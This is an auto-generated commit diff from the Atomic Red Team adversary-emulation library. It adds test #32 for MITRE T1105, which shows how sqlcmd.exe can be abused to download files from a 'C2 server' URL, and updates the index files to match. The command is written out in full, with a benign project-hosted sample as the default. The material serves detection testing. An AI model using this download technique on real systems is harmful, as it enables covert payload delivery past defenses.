Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1566-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1567-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Indexes-CSV/index.csv

@@ -1296,6 +1296,7 @@ command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b172
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,31,File download via nscurl,5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c,sh
+command-and-control,T1105,Ingress Tool Transfer,32,File Download with Sqlcmd.exe,6934c16e-0b3a-4e7f-ab8c-c414acd32181,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -871,6 +871,7 @@ command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,32,File Download with Sqlcmd.exe,6934c16e-0b3a-4e7f-ab8c-c414acd32181,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -1800,6 +1800,7 @@
   - Atomic Test #29: iwr or Invoke Web-Request download [windows]
   - Atomic Test #30: Arbitrary file download using the Notepad++ GUP.exe binary [windows]
   - Atomic Test #31: File download via nscurl [macos]
+  - Atomic Test #32: File Download with Sqlcmd.exe [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1251,6 +1251,7 @@
   - Atomic Test #28: Nimgrab - Transfer Files [windows]
   - Atomic Test #29: iwr or Invoke Web-Request download [windows]
   - Atomic Test #30: Arbitrary file download using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #32: File Download with Sqlcmd.exe [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]

atomics/Indexes/index.yaml

@@ -76893,6 +76893,34 @@ command-and-control:
         cleanup_command: rm "#{destination_path}"
         name: sh
         elevation_required: false
+    - name: File Download with Sqlcmd.exe
+      auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181
+      description: |-
+        One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
+        This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_url:
+          description: URL of the C2 Server from where file/s need to be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip
+        local_file_path:
+          description: The local file path along with filename to where the file needs
+            to be downloaded and placed.
+          type: path
+          default: C:\T1105.zip
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Windows package 'Sqlcmd' need to be available in the machine
+          to execute this atomic successfully
+        prereq_command: if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
+        get_prereq_command: winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
+      executor:
+        command: 'sqlcmd -i #{remote_url} -o #{local_file_path}'
+        cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
+        name: powershell
+        elevation_required: true
   T1665:
     technique:
       modified: '2024-04-18T19:44:00.603Z'

atomics/Indexes/windows-index.yaml

@@ -63813,6 +63813,34 @@ command-and-control:
         cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul
         name: command_prompt
         elevation_required: true
+    - name: File Download with Sqlcmd.exe
+      auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181
+      description: |-
+        One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
+        This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_url:
+          description: URL of the C2 Server from where file/s need to be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip
+        local_file_path:
+          description: The local file path along with filename to where the file needs
+            to be downloaded and placed.
+          type: path
+          default: C:\T1105.zip
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Windows package 'Sqlcmd' need to be available in the machine
+          to execute this atomic successfully
+        prereq_command: if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
+        get_prereq_command: winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
+      executor:
+        command: 'sqlcmd -i #{remote_url} -o #{local_file_path}'
+        cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
+        name: powershell
+        elevation_required: true
   T1665:
     technique:
       modified: '2024-04-18T19:44:00.603Z'

atomics/T1105/T1105.md

@@ -72,6 +72,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o
 
 - [Atomic Test #31 - File download via nscurl](#atomic-test-31---file-download-via-nscurl)
 
+- [Atomic Test #32 - File Download with Sqlcmd.exe](#atomic-test-32---file-download-with-sqlcmdexe)
+
 
 <br/>
 
@@ -1470,4 +1472,55 @@ rm "#{destination_path}"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #32 - File Download with Sqlcmd.exe
+One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
+This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6934c16e-0b3a-4e7f-ab8c-c414acd32181
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | URL of the C2 Server from where file/s need to be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip|
+| local_file_path | The local file path along with filename to where the file needs to be downloaded and placed. | path | C:&#92;T1105.zip|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+sqlcmd -i #{remote_url} -o #{local_file_path}
+```
+
+#### Cleanup Commands:
+```powershell
+rm "#{local_file_path}" 2>$null | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully
+##### Check Prereq Commands:
+```powershell
+if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
+```
+
+
+
+
 <br/>

atomics/T1105/T1105.yaml

@@ -895,6 +895,7 @@ atomic_tests:
     name: sh
     elevation_required: false
 - name: File Download with Sqlcmd.exe 
+  auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181
   description: |-
     One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
     This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL

atomics/used_guids.txt

@@ -1614,3 +1614,4 @@ bf07f520-3909-4ef5-aa22-877a50f2f77b
 ac494fe5-81a4-4897-af42-e774cf005ecb
 728eca7b-0444-4f6f-ac36-437e3d751dc0
 b4ca838d-d013-4461-bf2c-f7132617b409
+6934c16e-0b3a-4e7f-ab8c-c414acd32181